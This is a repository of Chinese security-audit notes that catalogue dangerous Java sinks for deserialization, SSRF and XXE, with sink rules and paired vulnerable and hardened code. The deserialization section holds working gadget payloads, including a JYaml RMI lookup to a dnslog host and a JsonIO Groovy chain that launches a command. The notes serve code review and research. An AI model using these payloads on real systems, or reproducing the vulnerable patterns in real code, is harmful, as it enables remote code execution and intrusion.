├── README.md ├── java ├── README.md ├── deserialization │ └── note.md ├── ssrf │ └── note.md └── xxe │ └── note.md └── python ├── logInjection └── note.md └── pathInjection └── note.md /README.md: -------------------------------------------------------------------------------- 1 | # sec-note 2 | 记录各语言、框架中危险的sink,个人代码审计、漏洞研究使用。 3 | -------------------------------------------------------------------------------- /java/README.md: -------------------------------------------------------------------------------- 1 | 记录Java危险的sinks 2 | -------------------------------------------------------------------------------- /java/deserialization/note.md: -------------------------------------------------------------------------------- 1 | # Java反序列化文档 2 | 3 | ## JYaml反序列化 4 | 5 | ```java 6 | import org.ho.yaml.Yaml; 7 | 8 | public class TestJYaml { 9 | 10 | String data = "--- !com.sun.rowset.JdbcRowSetImpl\n" 11 | + "dataSourceName: \"rmi://jyaml1.vwfkh3.dnslog.cn:1099/Exploit\"\n" 12 | + "autoCommit: true"; 13 | 14 | Yaml yaml = new Yaml(); 15 | 16 | yaml.load(data); //bad 17 | yaml.loadStream(data); //bad 18 | yaml.loadType(data, Object.class); //bad 当class指定为反序列化的类对象时,反序列化成功 19 | yaml.loadStreamOfType(data, Object.class); //bad 20 | 21 | } 22 | ``` 23 | 24 | ## JsonIO反序列化 25 | 26 | ```pom 27 | 28 | com.cedarsoftware 29 | json-io 30 | 4.10.0 31 | 32 | 33 | org.codehaus.groovy 34 | groovy-all 35 | 2.4.9 36 | 37 | ``` 38 | 39 | ```java 40 | import com.cedarsoftware.util.io.JsonReader; 41 | 42 | public class TestJsonIO { 43 | 44 | String poc = 
"{\"@type\":\"java.util.Arrays$ArrayList\",\"@items\":[{\"@id\":2,\"@type\":\"groovy.util.Expando\",\"expandoProperties\":{\"@type\":\"java.util.HashMap\",\"hashCode\":{\"@type\":\"org.codehaus.groovy.runtime.MethodClosure\",\"method\":\"start\",\"delegate\":{\"@id\":1,\"@type\":\"java.lang.ProcessBuilder\",\"command\":{\"@type\":\"java.util.ArrayList\",\"@items\":[\"cmd\",\"/c\",\"calc\"]},\"directory\":null,\"environment\":null,\"redirectErrorStream\":false,\"redirects\":null},\"owner\":{\"@ref\":1},\"thisObject\":null,\"resolveStrategy\":0,\"directive\":0,\"parameterTypes\":[],\"maximumNumberOfParameters\":0,\"bcw\":null}}},{\"@type\":\"java.util.HashMap\",\"@keys\":[{\"@ref\":2},{\"@ref\":2}],\"@items\":[{\"@ref\":2},{\"@ref\":2}]}]}"; 45 | 46 | JsonReader.jsonToJava(poc); 47 | } 48 | ``` 49 | 50 | ## YAMLBeans反序列化 51 | ```pom 52 | 53 | com.esotericsoftware.yamlbeans 54 | yamlbeans 55 | 1.09 56 | 57 | 58 | com.mchange 59 | c3p0 60 | 0.9.5.2 61 | 62 | ``` 63 | 64 | ```java 65 | import com.esotericsoftware.yamlbeans.YamlConfig; 66 | import com.esotericsoftware.yamlbeans.YamlReader; 67 | 68 | public class TestYAMLBeans { 69 | 70 | String data = "!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\n" 71 | + " userOverridesAsString: \"HexAsciiSerializedMap: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;\""; 72 | 73 | YamlConfig yc = new YamlConfig(); 74 | YamlReader r = new YamlReader(data, yc); //yc传不传入都行 75 | r.read(); 76 | r.read(Object.class); 77 | r.read(Object.class, Object.class); 78 | } 79 | ``` 80 | 81 | 82 | 83 | ## XStream反序列化 84 | 85 | 低版本验证 86 | 87 | ```PayLoad 88 | SSRF 89 | String payload = "\n" + 90 | " \n" + 91 | " \n" + 92 | " 0\n" + 93 | " \n" + 94 | " \n" + 95 | " \n" + 96 | " http://127.0.0.1:8000/ntuser.ini\n" + 97 | " \n" + 98 | " \n" + 99 | " \n" + 100 | " 0\n" + 101 | " \n" + 102 | " \n" + 103 | " test\n" + 104 | " \n" + 105 | ""; 106 | ```` 107 | 108 | ```java 109 | 110 | XStream xStream = new XStream(); 111 | 
xStream.fromXML(payload); //bad 112 | xStream.unmarshal(payload); //bad 113 | 114 | ``` 115 | 116 | ## Spring XStreamMarshaller反序列化 117 | 118 | 简介:Spring XStreamMarshaller底层调用了XStream, 开源代码库未找到相关使用 119 | 120 | ```java 121 | XStreamMarshaller xStreamMarshaller = new XStreamMarshaller(); 122 | ``` 123 | -------------------------------------------------------------------------------- /java/ssrf/note.md: -------------------------------------------------------------------------------- 1 | # Java SSRF跨站请求伪造文档 2 | 3 | * [java-net ssrf](#java-net-ssrf) 4 | * [springframework ssrf](#springframework-ssrf) 5 | 6 | ## 1 sinks: 7 | 8 | 格式:namespace;type;subtypes;names;signature;ext;input;additionalTaintStep;additionalTaintStepInput;additionalTaintStep1;additionalTaintStepInput1... 9 | 10 | 11 | namespace:包名 12 | type:类名 13 | names:触发漏洞方法名 14 | input:触发漏洞方法名的形参位置 15 | additionalTaintStep:依赖的污点 16 | 17 | 18 | ### 1.1 java-net: 19 | 20 | ```java 21 | java.net;URL;false;[openConnection, openStream];;;Argument[-1];java.net.URL(String);Argument[0] 22 | 23 | java.net;URLClassLoader;false;[loadClass, getResourceAsStream, findResource, getResource];;;Argument[-1];java.net.URLClassLoader(URL[]);Argument[0];java.net.URL(String);Argument[0] 24 | java.net;URLClassLoader;false;[loadClass, getResourceAsStream, findResource, getResource];;;Argument[-1];java.net.URLClassLoader(URL[], ClassLoader);Argument[0];java.net.URL(String);Argument[0] 25 | java.net;URLClassLoader;false;[loadClass, getResourceAsStream, findResource, getResource];;;Argument[-1];java.net.URLClassLoader(URL[],ClassLoader,URLStreamHandlerFactory);Argument[0];java.net.URL(String);Argument[0] 26 | java.net;URLClassLoader;false;[loadClass, getResourceAsStream, findResource, getResource];;;Argument[-1];java.net.URLClassLoader(String,URL[],ClassLoader);Argument[1];java.net.URL(String);Argument[0] 27 | java.net;URLClassLoader;false;[loadClass, getResourceAsStream, findResource, 
getResource];;;Argument[-1];java.net.URLClassLoader(String,URL[],ClassLoader,URLStreamHandlerFactory);Argument[1];java.net.URL(String);Argument[0] 28 | 29 | 30 | java.net;URLClassLoader;false;[loadClass, getResourceAsStream, findResource, getResource];;;Argument[-1];java.net.URLClassLoader.newInstance(URL[]);Argument[0];java.net.URL(String);Argument[0] 31 | java.net;URLClassLoader;false;[loadClass, getResourceAsStream, findResource, getResource];;;Argument[-1];java.net.URLClassLoader.newInstance(URL[],ClassLoader);Argument[0];java.net.URL(String);Argument[0] 32 | 33 | java.net.http;HttpRequest;false;[newBuilder];;;Argument[0];java.net.URI.create(String);Argument[0] # jdk11 34 | java.net.http;HttpRequest.Builder;false;[uri];;;Argument[0];java.net.URI.create(String);Argument[0] # jdk11 35 | ``` 36 | java.net.URI.create(String);Argument[0] 应该做为一个全局污点 37 | 38 | ### 1.2 springframework: 39 | 40 | org.springframework.web.client.RestTemplate 属于 spring-web模块 41 | ```java 42 | org.springframework.web.client;RestTemplate;false;[put,delete,exchange,execute,getForEntity,getForObject,headForHeaders,optionsForAllow,patchForObject,postForEntity,postForLocation,postForObject];;;Argument[0] 43 | org.springframework.web.client;RestTemplate;false;[put,delete,doExecute,execute,getForEntity,getForObject,headForHeaders,optionsForAllow,patchForObject,postForEntity,postForLocation,postForObject];;;Argument[0];java.net.URI.create(String);Argument[0] 44 | org.springframework.web.client;RestTemplate;false;[exchange];;;Argument[0];org.springframework.http.RequestEntity(...,URI,...);Argument[ParameterType = URI] # 创建RequestEntity对象,URI形参位置 45 | ``` 46 | 47 | 48 | 49 | ## 2 示例 50 | 51 | ### Java net ssrf 52 | 53 | java.net.URL 支持的协议:file、ftp、http、https、jar、mailto、netdoc 54 | 55 | 56 | 57 | ```java 58 | import java.net.URL; 59 | import java.net.URI; 60 | import java.net.http.HttpClient; 61 | import java.net.http.HttpRequest; 62 | import java.net.http.HttpResponse; 63 | import 
java.net.http.HttpResponse.BodyHandlers;
import java.net.URLClassLoader;

public void badJavaNetURLSSRF(HttpServletRequest request) throws Exception {
    String requestUrl = request.getParameter("url");
    URL xxx = new URL(requestUrl);
    xxx.openConnection(); //bad
    xxx.openStream(); //bad
}

public void badJavaNetURLClassLoaderSSRF(HttpServletRequest request) throws Exception {
    String requestUrl = request.getParameter("url");
    URL[] urls = new URL[]{new URL(requestUrl)}; //URL直接来自请求参数
    URLClassLoader urlClassLoader = URLClassLoader.newInstance(urls);
    urlClassLoader.findResource("test"); //bad
    urlClassLoader.loadClass("aaa"); //bad 注意:类字节码会从攻击者控制的URL下载并定义,危害不止SSRF,相当于远程代码执行
}

public void badJavaNetHttpRequestSSRF(HttpServletRequest request) throws Exception {
    String requestUrl = request.getParameter("url");
    HttpClient client = HttpClient.newHttpClient();
    HttpRequest httpRequest = HttpRequest.newBuilder().uri(URI.create(requestUrl)).build(); //bad (局部变量不能与形参request重名,否则无法编译)
    client.sendAsync(httpRequest, BodyHandlers.ofString()).thenApply(HttpResponse::body).thenAccept(System.out::println).join();
}
```

### springframework ssrf


```java
import java.net.URI;
import org.springframework.web.client.RestTemplate;

public void badRestTemplateSSRF(HttpServletRequest request) throws Exception {
    String requestUrl = request.getParameter("url");
    RestTemplate restTemplate = new RestTemplate();
    restTemplate.delete(requestUrl); //bad
}

public void badRestTemplateUriSSRF(HttpServletRequest request) throws Exception {
    String requestUrl = request.getParameter("url");
    RestTemplate restTemplate = new RestTemplate();
    restTemplate.delete(URI.create(requestUrl)); //bad
}
```
--------------------------------------------------------------------------------
/java/xxe/note.md:
--------------------------------------------------------------------------------
# Java XML external entity (XXE) injection文档

* 
[Commons-Digester3 XXE注入](#Commons-Digester3-XXE注入) 4 | * [Commons-Digester XXE注入](#Commons-Digester-XXE注入) 5 | * [Tomcat-Digester XXE注入](#Tomcat-Digester-XXE注入) 6 | * [DocumentHelper XXE注入](#DocumentHelper-XXE注入) 7 | * [Validator XXE注入](#Validator-XXE注入) 8 | * [XMLDecoder XXE注入](#XMLDecoder-XXE注入) 9 | * [DocumentBuilder XXE注入](#DocumentBuilder-XXE注入) 10 | * [jdom2-SAXBuilder XXE注入](#jdom2-SAXBuilder-XXE注入) 11 | * [jdom-SAXBuilder XXE注入](#jdom-SAXBuilder-XXE注入) 12 | * [SAXParser XXE注入](#SAXParser-XXE注入) 13 | * [SAXReader XXE注入](#SAXReader-XXE注入) 14 | * [XMLReader XXE注入](#XMLReader-XXE注入) 15 | * [Transformer XXE注入](#Transformer-XXE注入) 16 | * [TransformerFactory XXE注入](#TransformerFactory-XXE注入) 17 | * [SAXTransformerFactory XXE注入](#SAXTransformerFactory-XXE注入) 18 | * [SchemaFactory XXE注入](#SchemaFactory-XXE注入) 19 | * [Unmarshaller XXE注入](#Unmarshaller-XXE注入) 20 | * [XPathExpression XXE注入](#XPathExpression-XXE注入) 21 | * [Persister XXE注入](#Persister-XXE注入) 22 | 23 | sinks: 24 | 25 | Commons-Digester3: 26 | 27 | ``` 28 | org.apache.commons.digester3.Digester;parse(File file); T 29 | org.apache.commons.digester3.Digester;parse(InputSource input); T 30 | org.apache.commons.digester3.Digester;parse(InputStream input); T 31 | org.apache.commons.digester3.Digester;parse(Reader reader); T 32 | org.apache.commons.digester3.Digester;parse(String uri); T 33 | org.apache.commons.digester3.Digester;parse(URL url); T 34 | org.apache.commons.digester3.Digester;asyncParse(final File file); T 35 | org.apache.commons.digester3.Digester;asyncParse(InputSource input); T 36 | org.apache.commons.digester3.Digester;asyncParse(InputStream input); T 37 | org.apache.commons.digester3.Digester;asyncParse(Reader reader); T 38 | org.apache.commons.digester3.Digester;asyncParse(String uri); T 39 | org.apache.commons.digester3.Digester;asyncParse(URL url); T 40 | ``` 41 | 42 | Commons-Digester: 43 | 44 | ``` 45 | org.apache.commons.digester.Digester;parse(File file);Object 46 | 
org.apache.commons.digester.Digester;parse(InputSource input);Object 47 | org.apache.commons.digester.Digester;parse(InputStream input);Object 48 | org.apache.commons.digester.Digester;parse(Reader reader);Object 49 | org.apache.commons.digester.Digester;parse(String uri);Object 50 | org.apache.commons.digester.Digester;parse(URL url);Object 51 | ``` 52 | 53 | Tomcat-Digester: 54 | 55 | ``` 56 | org.apache.tomcat.util.digester.Digester;parse(File file);Object 57 | org.apache.tomcat.util.digester.Digester;parse(InputSource input);Object 58 | org.apache.tomcat.util.digester.Digester;parse(InputStream input);Object 59 | ``` 60 | 61 | DocumentHelper: 62 | 63 | ``` 64 | org.dom4j.DocumentHelper;parseText(String text);Document 65 | ``` 66 | 67 | Validator: 68 | 69 | ``` 70 | javax.xml.validation.Validator;validate(Source source);void 71 | ``` 72 | 73 | XMLDecoder: 74 | 75 | ``` 76 | java.beans.XMLDecoder;readObject();Object 77 | ``` 78 | 79 | DocumentBuilder: 80 | 81 | ``` 82 | javax.xml.parsers.DocumentBuilder;parse(InputStream is);Document 83 | javax.xml.parsers.DocumentBuilder;parse(InputStream is, String systemId);Document 84 | javax.xml.parsers.DocumentBuilder;parse(String uri);Document 85 | javax.xml.parsers.DocumentBuilder;parse(File f);Document 86 | javax.xml.parsers.DocumentBuilder;parse(InputSource is);Document 87 | ``` 88 | 89 | jdom-SAXBuilder: 90 | 91 | ``` 92 | org.jdom.input.SAXBuilder;build(org.w3c.dom.Document domDocument);Document 93 | org.jdom.input.SAXBuilder;build(org.w3c.dom.Element domElement);Document 94 | ``` 95 | 96 | jdom2-SAXBuilder: 97 | 98 | ``` 99 | org.jdom2.input.SAXBuilder;build(InputSource in);Document 100 | org.jdom2.input.SAXBuilder;build(InputStream in);Document 101 | org.jdom2.input.SAXBuilder;build(File file);Document 102 | org.jdom2.input.SAXBuilder;build(URL url);Document 103 | org.jdom2.input.SAXBuilder;build(InputStream in, String systemId);Document 104 | org.jdom2.input.SAXBuilder;build(Reader characterStream);Document 105 | 
org.jdom2.input.SAXBuilder;build(Reader characterStream, String systemId);Document 106 | org.jdom2.input.SAXBuilder;build(String systemId);Document 107 | ``` 108 | 109 | SAXParser: 110 | 111 | ``` 112 | javax.xml.parsers.SAXParser;parse(InputStream is, HandlerBase hb);void 113 | javax.xml.parsers.SAXParser;parse(InputStream is, HandlerBase hb, String systemId);void 114 | javax.xml.parsers.SAXParser;parse(InputStream is, DefaultHandler dh);void 115 | javax.xml.parsers.SAXParser;parse(InputStream is, DefaultHandler dh, String systemId);void 116 | javax.xml.parsers.SAXParser;parse(String uri, HandlerBase hb);void 117 | javax.xml.parsers.SAXParser;parse(String uri, DefaultHandler dh);void 118 | javax.xml.parsers.SAXParser;parse(File f, HandlerBase hb);void 119 | javax.xml.parsers.SAXParser;parse(File f, DefaultHandler dh);void 120 | javax.xml.parsers.SAXParser;parse(InputSource is, HandlerBase hb);void 121 | javax.xml.parsers.SAXParser;parse(InputSource is, DefaultHandler dh);void 122 | ``` 123 | 124 | SAXReader: 125 | 126 | ``` 127 | org.dom4j.io.SAXReader;read(File file);Document 128 | org.dom4j.io.SAXReader;read(URL url);Document 129 | org.dom4j.io.SAXReader;read(String systemId);Document 130 | org.dom4j.io.SAXReader;read(InputStream in);Document 131 | org.dom4j.io.SAXReader;read(Reader reader);Document 132 | org.dom4j.io.SAXReader;read(InputStream in, String systemId);Document 133 | org.dom4j.io.SAXReader;read(Reader reader, String systemId);Document 134 | org.dom4j.io.SAXReader;read(InputSource in);Document 135 | ``` 136 | 137 | XMLReader: 138 | 139 | ``` 140 | org.xml.sax.XMLReader;parse(InputSource input);void 141 | org.xml.sax.XMLReader;parse(String systemId);void 142 | ``` 143 | 144 | Transformer: 145 | 146 | ``` 147 | javax.xml.transform.Transformer;transform(Source xmlSource, Result outputTarget);void 148 | ``` 149 | 150 | TransformerFactory: 151 | 152 | ``` 153 | javax.xml.transform.TransformerFactory;newTransformer(Source source);Transformer 154 | ``` 155 
| 156 | SAXTransformerFactory(TransformerFactory子类): 157 | 158 | ``` 159 | javax.xml.transform.sax.SAXTransformerFactory;newTransformer(Source source);Transformer 160 | javax.xml.transform.sax.SAXTransformerFactory;newTransformerHandler(Source src);TransformerHandler 161 | javax.xml.transform.sax.SAXTransformerFactory;newTransformerHandler(Templates templates);TransformerHandler 162 | javax.xml.transform.sax.SAXTransformerFactory;newXMLFilter(Source src);XMLFilter 163 | javax.xml.transform.sax.SAXTransformerFactory;newXMLFilter(Templates templates);XMLFilter 164 | ``` 165 | 166 | SchemaFactory: 167 | 168 | ``` 169 | javax.xml.validation.SchemaFactory;newSchema(Source schema);Schema 170 | javax.xml.validation.SchemaFactory;newSchema(File schema);Schema 171 | javax.xml.validation.SchemaFactory;newSchema(URL schema);Schema 172 | javax.xml.validation.SchemaFactory;newSchema(Source[] schemas);Schema 173 | ``` 174 | 175 | Unmarshaller: 176 | 177 | ``` 178 | javax.xml.bind.Unmarshaller;unmarshal(java.io.File f);Object 179 | javax.xml.bind.Unmarshaller;unmarshal(java.io.InputStream is);Object 180 | javax.xml.bind.Unmarshaller;unmarshal(Reader reader);Object 181 | javax.xml.bind.Unmarshaller;unmarshal(java.net.URL url);Object 182 | javax.xml.bind.Unmarshaller;unmarshal(org.xml.sax.InputSource source);Object 183 | javax.xml.bind.Unmarshaller;unmarshal(org.w3c.dom.Node node);Object 184 | javax.xml.bind.Unmarshaller;unmarshal(org.w3c.dom.Node node, Class declaredType);Object 185 | javax.xml.bind.Unmarshaller;unmarshal(javax.xml.transform.Source source);Object 186 | javax.xml.bind.Unmarshaller;unmarshal(javax.xml.transform.Source source, Class declaredType);Object 187 | javax.xml.bind.Unmarshaller;unmarshal(javax.xml.stream.XMLStreamReader reader);Object 188 | javax.xml.bind.Unmarshaller;unmarshal(javax.xml.stream.XMLStreamReader reader, Class declaredType);Object 189 | javax.xml.bind.Unmarshaller;unmarshal(javax.xml.stream.XMLEventReader reader);Object 190 | 
javax.xml.bind.Unmarshaller;unmarshal(javax.xml.stream.XMLEventReader reader, Class declaredType);Object 191 | ``` 192 | 193 | XPathExpression: 194 | 195 | ``` 196 | javax.xml.xpath.XPathExpression;evaluate(InputSource source, QName returnType);Object 197 | javax.xml.xpath.XPathExpression;evaluate(InputSource source);String 198 | ``` 199 | 200 | Persister: 201 | 202 | ``` 203 | org.simpleframework.xml.core.Persister;read(Class type, String source); T 204 | org.simpleframework.xml.core.Persister;read(Class type, File source); T 205 | org.simpleframework.xml.core.Persister;read(Class type, InputStream source); T 206 | org.simpleframework.xml.core.Persister;read(Class type, Reader source); T 207 | org.simpleframework.xml.core.Persister;read(Class type, InputNode source); T 208 | org.simpleframework.xml.core.Persister;read(Class type, String source, boolean strict); T 209 | org.simpleframework.xml.core.Persister;read(Class type, File source, boolean strict); T 210 | org.simpleframework.xml.core.Persister;read(Class type, InputStream source, boolean strict); T 211 | org.simpleframework.xml.core.Persister;read(Class type, Reader source, boolean strict); T 212 | org.simpleframework.xml.core.Persister;read(Class type, InputNode node, boolean strict); T 213 | org.simpleframework.xml.core.Persister;read(Class type, InputNode node, Session session); T 214 | org.simpleframework.xml.core.Persister;read(Class type, InputNode node, Context context); T 215 | org.simpleframework.xml.core.Persister;read(T value, String source); T 216 | org.simpleframework.xml.core.Persister;read(T value, File source); T 217 | org.simpleframework.xml.core.Persister;read(T value, InputStream source); T 218 | org.simpleframework.xml.core.Persister;read(T value, Reader source); T 219 | org.simpleframework.xml.core.Persister;read(T value, InputNode source); T 220 | org.simpleframework.xml.core.Persister;read(T value, String source, boolean strict); T 221 | org.simpleframework.xml.core.Persister;read(T 
value, File source, boolean strict); T 222 | org.simpleframework.xml.core.Persister;read(T value, InputStream source, boolean strict); T 223 | org.simpleframework.xml.core.Persister;read(T value, Reader source, boolean strict); T 224 | org.simpleframework.xml.core.Persister;read(T value, InputNode node, boolean strict); T 225 | org.simpleframework.xml.core.Persister;read(T value, InputNode node, Session session); T 226 | org.simpleframework.xml.core.Persister;read(T value, InputNode node, Context context); T 227 | org.simpleframework.xml.core.Persister;validate(Class type, String source);boolean 228 | org.simpleframework.xml.core.Persister;validate(Class type, File source);boolean 229 | org.simpleframework.xml.core.Persister;validate(Class type, InputStream source);boolean 230 | org.simpleframework.xml.core.Persister;validate(Class type, Reader source);boolean 231 | org.simpleframework.xml.core.Persister;validate(Class type, InputNode source);boolean 232 | org.simpleframework.xml.core.Persister;validate(Class type, String source, boolean strict);boolean 233 | org.simpleframework.xml.core.Persister;validate(Class type, File source, boolean strict);boolean 234 | org.simpleframework.xml.core.Persister;validate(Class type, InputStream source, boolean strict);boolean 235 | org.simpleframework.xml.core.Persister;validate(Class type, Reader source, boolean strict);boolean 236 | org.simpleframework.xml.core.Persister;validate(Class type, InputNode node, boolean strict);boolean 237 | org.simpleframework.xml.core.Persister;validate(Class type, InputNode node, Session session);boolean 238 | org.simpleframework.xml.core.Persister;validate(Class type, InputNode node, Context context);boolean 239 | ``` 240 | 241 | 242 | ## Commons-Digester3 XXE注入 243 | 244 | 245 | `mvnrepository.com`最新版本更新到3.2,该组件所有版本目前都存在问题. 
246 | 247 | ```pom 248 | 249 | org.apache.commons 250 | commons-digester3 251 | 3.2 252 | 253 | ``` 254 | 255 | ```java 256 | import org.apache.commons.digester3.Digester; 257 | 258 | public void badDigester(HttpServletRequest request, HttpServletResponse response) throws Exception { 259 | ServletInputStream servletInputStream = request.getInputStream(); 260 | Digester digester = new Digester(); 261 | digester.parse(servletInputStream); //实际调用org.xml.sax.XMLReader解析xml数据 262 | } 263 | 264 | 265 | public void okDigester(HttpServletRequest request, HttpServletResponse response) throws Exception { 266 | ServletInputStream servletInputStream = request.getInputStream(); 267 | Digester digester = new Digester(); 268 | digester.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 269 | digester.setFeature("http://xml.org/sax/features/external-general-entities", false); 270 | digester.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 271 | digester.parse(servletInputStream); 272 | } 273 | ``` 274 | 275 | ## Commons-Digester XXE注入 276 | 277 | `mvnrepository.com`最新版本更新到2.1,该组件所有版本目前都存在问题. 
278 | 279 | ```pom 280 | 281 | commons-digester 282 | commons-digester 283 | 2.1 284 | 285 | ``` 286 | 287 | ```java 288 | import org.apache.commons.digester.Digester; 289 | 290 | public void badDigester(HttpServletRequest request, HttpServletResponse response) throws Exception { 291 | ServletInputStream servletInputStream = request.getInputStream(); 292 | Digester digester = new Digester(); 293 | digester.parse(servletInputStream); //实际调用org.xml.sax.XMLReader解析xml数据 294 | } 295 | 296 | 297 | public void okDigester(HttpServletRequest request, HttpServletResponse response) throws Exception { 298 | ServletInputStream servletInputStream = request.getInputStream(); 299 | Digester digester = new Digester(); 300 | digester.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 301 | digester.setFeature("http://xml.org/sax/features/external-general-entities", false); 302 | digester.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 303 | digester.parse(servletInputStream); 304 | } 305 | ``` 306 | 307 | ## Tomcat-Digester XXE注入 308 | 309 | apache tomcat自己实现了Digester解析xml文件, 使用该类时存在xxe注入漏洞. 
310 | 311 | ```java 312 | import org.apache.tomcat.util.digester.Digester; 313 | 314 | public void badDigester(HttpServletRequest request, HttpServletResponse response) throws Exception { 315 | ServletInputStream servletInputStream = request.getInputStream(); 316 | Digester digester = new Digester(); 317 | digester.parse(servletInputStream); //实际调用org.xml.sax.XMLReader解析xml数据 318 | } 319 | 320 | 321 | public void okDigester(HttpServletRequest request, HttpServletResponse response) throws Exception { 322 | ServletInputStream servletInputStream = request.getInputStream(); 323 | Digester digester = new Digester(); 324 | digester.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 325 | digester.setFeature("http://xml.org/sax/features/external-general-entities", false); 326 | digester.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 327 | digester.parse(servletInputStream); 328 | } 329 | ``` 330 | 331 | ## DocumentHelper XXE注入 332 | 333 | 低于2.1.1版本的存在漏洞 334 | 335 | ```pom 336 | 337 | org.dom4j 338 | dom4j 339 | 2.0.1 340 | 341 | ``` 342 | 343 | ```java 344 | import org.dom4j.Document; 345 | import org.dom4j.DocumentHelper; 346 | 347 | public void badDocumentHelper(HttpServletRequest request) throws Exception { 348 | BufferedReader br = request.getReader(); 349 | String str = ""; 350 | StringBuilder listString = new StringBuilder(); 351 | while ((str = br.readLine()) != null) { 352 | listString.append(str).append("\n"); 353 | } 354 | Document document = DocumentHelper.parseText(listString.toString()); 355 | } 356 | ``` 357 | 358 | ## Validator XXE注入 359 | 360 | JDK原生, CVE-2019-12415中的sink 361 | 362 | ```java 363 | import javax.xml.transform.stream.StreamSource; 364 | import javax.xml.validation.Schema; 365 | import javax.xml.validation.SchemaFactory; 366 | import javax.xml.validation.Validator; 367 | 368 | public void badValidator(HttpServletRequest request) throws Exception { 369 | ServletInputStream servletInputStream 
= request.getInputStream();
    SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
    Schema schema = factory.newSchema();
    Validator validator = schema.newValidator();
    StreamSource source = new StreamSource(servletInputStream);
    validator.validate(source);
}


public void ok1Validator(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
    factory.setFeature("http://javax.xml.XMLConstants/feature/secure-processing", true); //JDK内置实现下等价于把accessExternalDTD/accessExternalSchema置空;换用第三方实现时需另行确认
    Schema schema = factory.newSchema();
    Validator validator = schema.newValidator();
    StreamSource source = new StreamSource(servletInputStream);
    validator.validate(source);
}

public void ok2Validator(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
    Schema schema = factory.newSchema();
    Validator validator = schema.newValidator();
    validator.setProperty("http://javax.xml.XMLConstants/property/accessExternalDTD", "");
    validator.setProperty("http://javax.xml.XMLConstants/property/accessExternalSchema", "");
    StreamSource source = new StreamSource(servletInputStream);
    validator.validate(source);
}
```


## XMLDecoder XXE注入

JDK原生,在JDK1.7.0_21测试存在,JDK1.8不存在,JDK1.7.X其他版本暂未测试。

注意:XMLDecoder.readObject() 会按XML中描述的内容实例化任意类并调用其方法,对不可信输入而言,无论是否存在XXE,它本身就等同于远程代码执行,审计时不应只当作XXE sink处理。

```java
import java.beans.XMLDecoder;

public void badXMLDecoder(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    XMLDecoder xmlDecoder = new XMLDecoder(servletInputStream);
    xmlDecoder.readObject(); //bad 不仅是XXE,等同于反序列化RCE
}
```

## DocumentBuilder XXE注入

```java
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

public void badDocumentBuilder(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    DocumentBuilder documentBuilder = factory.newDocumentBuilder();
    documentBuilder.parse(servletInputStream); //bad 默认配置允许DOCTYPE和外部实体
}

public void okDocumentBuilder(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    DocumentBuilder documentBuilder = factory.newDocumentBuilder();
    documentBuilder.parse(servletInputStream);
}
```

## jdom2-SAXBuilder XXE注入

注意:开启DTD校验(`new SAXBuilder(true)`)并不能防御XXE,校验本身就需要加载DTD,外部实体仍会被解析;必须通过setFeature关闭DOCTYPE/外部实体。

```java
import org.jdom2.Document;
import org.jdom2.input.SAXBuilder;

public void badSAXBuilder(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    SAXBuilder builder = new SAXBuilder();
    Document doc = builder.build(servletInputStream); //bad
}

public void badValidatingSAXBuilder(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    SAXBuilder builder = new SAXBuilder(true); //bad 仅开启校验,外部实体仍会被解析
    Document doc = builder.build(servletInputStream);
}

public void okSAXBuilder(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    SAXBuilder saxBuilder = new SAXBuilder();
    saxBuilder.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    saxBuilder.setFeature("http://xml.org/sax/features/external-general-entities", false);
    saxBuilder.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    saxBuilder.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    Document doc = saxBuilder.build(servletInputStream);
}
```

## jdom-SAXBuilder XXE注入

```java
import org.jdom.Document;
import org.jdom.input.SAXBuilder;

public void badSAXBuilder(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    SAXBuilder builder = new SAXBuilder();
    Document doc = builder.build(servletInputStream); //bad
}
```

## SAXParser XXE注入

```java
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;

public void badSAXParser(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    SAXParserFactory spf = SAXParserFactory.newInstance();
    SAXParser parser = spf.newSAXParser();
    parser.parse(servletInputStream, new HandlerBase()); //bad
}

public void okSAXParser(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    SAXParserFactory spf = SAXParserFactory.newInstance();
    spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
    spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    SAXParser parser = spf.newSAXParser();
    parser.parse(servletInputStream, new HandlerBase());
}
```

## SAXReader XXE注入

